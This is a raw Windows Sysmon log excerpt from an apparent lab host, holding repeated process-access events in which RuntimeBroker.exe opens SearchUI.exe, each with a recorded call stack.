12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 